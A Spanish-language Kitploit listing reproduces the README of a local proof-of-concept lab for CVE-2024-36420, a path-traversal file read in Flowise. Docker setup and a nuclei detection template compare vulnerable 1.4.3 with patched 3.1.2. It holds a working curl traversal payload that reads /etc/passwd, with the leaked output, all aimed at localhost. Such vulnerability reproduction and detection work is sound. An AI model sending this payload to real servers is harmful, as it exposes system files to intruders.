Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC_CVE-2024-36420 — POC_CVE-2024-36420 | Kitploit
Herramientas/GitHubGitHub/fineman999/poc_cve-2024-36420
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebFuzzingAprendizaje y EducaciónLabs y Práctica
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

POC_CVE-2024-36420

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC_CVE-2024-36420

Laboratorio de reproducción local y borrador de plantilla nuclei para CVE-2024-36420 que afecta a Flowise.

Resumen

CVE-2024-36420 es una lectura arbitraria de archivos en Flowise causada por el uso no sanitizado del parámetro fileName del cuerpo en:

  • POST /api/v1/openai-assistants-file

Este laboratorio se utilizó para validar:

  • comportamiento vulnerable en flowiseai/flowise:1.4.3
  • comportamiento denegado en la versión más reciente flowiseai/flowise:3.1.2

Referencias

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

Archivos

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Prueba vulnerable

Iniciar Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Verificación manual:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Respuesta vulnerable observada:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Control de versión más reciente

Iniciar Flowise 3.1.2 más reciente:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Verificación manual:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Respuesta de la versión más reciente observada:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Validar la plantilla:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

Ejecutar contra el objetivo vulnerable:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Comportamiento esperado:

  • 1.4.3: coincidencia
  • 3.1.2: sin coincidencia

Notas

  • La diferencia de versión es aceptable porque este repositorio solo afirma el comportamiento observado:
    • vulnerable en 1.4.3
    • denegado en 3.1.2
  • No afirma el límite exacto de la versión parcheada.
  • No se utilizaron objetivos del mundo real.
Descargar herramienta